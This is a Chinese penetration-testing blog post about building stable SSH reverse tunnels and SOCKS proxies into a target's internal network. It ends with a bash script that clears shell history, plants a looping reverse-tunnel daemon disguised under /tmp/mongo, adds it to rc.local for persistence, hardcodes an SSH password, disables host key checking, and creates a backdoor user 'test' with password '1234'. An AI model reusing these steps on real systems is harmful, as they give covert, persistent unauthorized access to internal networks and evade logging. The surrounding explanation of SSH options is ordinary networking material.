SSH如何反向代理稳定穿透内网

点击“合天智汇”关注,学习网安干货

最近在测试一些站点,总是需要进入到对方内网,而使用的代理工具多为不稳定工具,就连ssh也会断掉,这篇文章分享一下SSH的反向代理,最下面准备啦一个简单的脚本。

0x01 引言

早期我们可能会采用HTTP Proxy代理,在浏览器上设置下代理服务器的IP、端口、认证账户和密码。但有些软件的网络通信数据并不是HTTP协议,就需要寻找其它方法。

SOCKS代理是个不错的解决方案,不管应用层是什么协议,只要是传输层是TCP协议就可以代理。SOCKS代理中最新的协议是SOCKS5。相对SOCKS4作了大幅度的增强。

首先,它增加了对UDP协议的支持;其次,可支持多种用户身份验证方式和通信加密方式;最后,修改了SOCKS服务器进行域名解析的方法,使其更加优雅。

0x02 Socks建立

关于内网的代理工具前人已经总结很多了比如这篇文章内网漫游之SOCKS代理大结局,那我就不多说这些工具了。稳定SOCKS代理SSHSSH当之无愧是目前最稳定的代理方式之一,大家用它比较多,但是我们常用的还是他的最简单的转发与正向代理的建立,这里把SSH反向代理分享与大家,不用再为渗透中不稳定的网络而烦恼。转发我们常用的是下面的命令,但只能够比较麻烦的访问到已经转发端口上

1. ssh -CfNg -R 2222:127.0.0.1:22 VPS-user@VPS -p 53 //内网 

2. ssh -CfNg -L 8080:127.0.0.1:2222 VPS-user@VPS //VPS 本地访问VPS:8080就是内网的22端口

-C:该参数将使ssh压缩所有通过Secure Shell客户端发送的数据,包括输入、输出、错误消息及转发数据。它使用gzip算法,压缩级别可通过设置配制文件中的参数Compressicn Level来指定。这对于缓慢的传输线路特别有用的。但对于传输速度已经很快的网络则显得没有必要。同样,你可以利用配制文件针对每台主机配置这个参数。 

-f:该参数将ssh连接送入后台执行。这在验证已经完成且TCP/IP转发已经建立的情况下会生效。这对在远程主机上启动X程序显得十分重要。其后用户将被提示要求输入口令(提供的认证代理不运行),然后将连接送往后台。 

-g:该参数允许远程主机通过端口转发与主机端口相连,通常情况下仅允许本地主机这样做。 

-N:不执行远程指令。 

-R:远程转发 

-L:本地转发

socks正向代理

下面的方式可以用与你与DMZ区的机器通信,但是如果不能直接访问的内网机器便行不通了。

ssh -qTfnN -D port remotehost

在本地终端中运行 

ssh -qTfnN -D 6080 user@theserver 

然后在浏览器或者软件中设置好代理参数 

socks5: 127.0.0.1:6080 后便可以使用.

-q:静默运行

实已经很明显了,反向代理就是把上面提到的两个隧道连接在一起,怎么连接呢?

socks反向代理

那么重点来了,如何建立反向代理呢?其实就是把正向代理和转发结合起来即可:

这里为了方便描述,截了几个图,画得丑见笑了...:

第一步,还是先通过内网机器反向连接VPS:

ssh -p 22 -qngfNTR 6666:localhost:22 VPS-user@VPS

这样就把本地的22端口转发到了远程机器(VPS)的6666端口

查看图中Server机器的进程: 

Server机器转发: 

此时到vps上查看已经在6666端口开始监听了 

第二步,你自己的PC机器直接使用语句:

ssh -p 6666 -qngfNTD 6767 内网用户@VPS

这样就可以直接穿透网络,进入到内网,本地机器直接使用代理127.0.0.1:6767便能够直接访问到内网当中本地远程访问: 

在Server上开启80端口服务

配置代理: 

访问:

进阶配置那么问题来了,用过SSH的代理的朋友应该知道,我们第一步使用的连接方式在VPS监听的6666端口应该是监听在localhost上的,那么在第一步之前就应该修改一些配置了:在VPS的ssh配置当中加入如下配置GatewayPorts yes,这里是指远程转发过来的端口监听在0.0.0.0上。当然也可以你再在VPS本地转发一次即可。这样就完了吗?当然没有,经过测试,我们是无法让这个代理保持一直在线的,SSH在一定时间没有任何的操作后就会自动的断开,那么我们同样再次修改配置文件:找到 ClientAliveInterval 0和ClientAliveCountMax 3并将注释符号("#")去掉, 将ClientAliveInterval对应的0改成60,ClientAliveInterval指定了服务器端向客户端请求消息的时间间隔, 默认是0,不发送. ClientAliveInterval 60表示每分钟发送一次, 然后客户端响应, 这样就保持长连接了. ClientAliveCountMax, 使用默认值3即可.ClientAliveCountMax表示服务器发出请求后客户端没有响应的次数达到一定值, 就自动断开. 这样的配置就能让一个SSH的配置保持长连接了,代理就能稳定的在线。那么这样是需要每次都输入密码而且每次输入一大堆命令很麻烦,这里写了一个简单的CentOS上使用脚本来开启代理。

#!/usr/bin/env bash

#author: rootclay

export HISTSIZE=0

#install

cd /etc/yum.repos.d/ 

wget :Strahlex/CentOS_CentOS-6/home:Strahlex.repo 

yum install -y sshpass 

yum install -y screen

mkdir /tmp/mongo && chown $(whoami):$(whoami) /tmp/mongo 

sudo tee /tmp/mongo/daemon.sh <<-EOF

 

#!/usr/bin/env bash

while: 

do 

    /usr/bin/sshpass -p 你的VPS密码 ssh -p 22 -qngfNTR 6770:localhost:22 

    VPS-user@VPS -o StrictHostKeyChecking=no 

    sleep 18000 

    ps -ef | grep qngfNTR | awk {print $2} | xargs kill -9 

done 

EOF

 

chmod +x /tmp/mongo/daemon.sh 

echo "screen -dmS test /tmp/mongo/daemon.sh" >> /etc/rc.d/rc.local 

screen -dmS socks /tmp/mongo/daemon.sh 

useradd test;echo test:1234 | chpasswd

 

/usr/local/bin/sshpass -p "1234" ssh -p 6770 -qngfNTD 6770 test@VPS -o 

StrictHostKeyChecking=no 

本地执行执行这条命令即可,代理设置为127.0.0.1:6770即可进入内网这样建立起来的socks网络是非常的稳定的,搭建了之后可以试一试开扫描器扫一扫,高线程都不会掉。。。而前面使用的比如EW之类的。。。一扫就挂=。=,这个开个高线程完全没问题。

本文转自:安全客

别忘了投稿哟!!!

合天开启原创投稿啦!!!

大家有好的技术原创文章。

欢迎投稿至邮箱:[email protected]

合天会根据文章的时效、新颖、文笔、实用等多方面评判给予100元-500元不等的稿费哟。

有才能的你快来投稿吧!

 

合天网安实验室

网址 : www.hetianlab.com

电话:4006-123-731

长按图片,据说只有颜值高的人才能识别哦→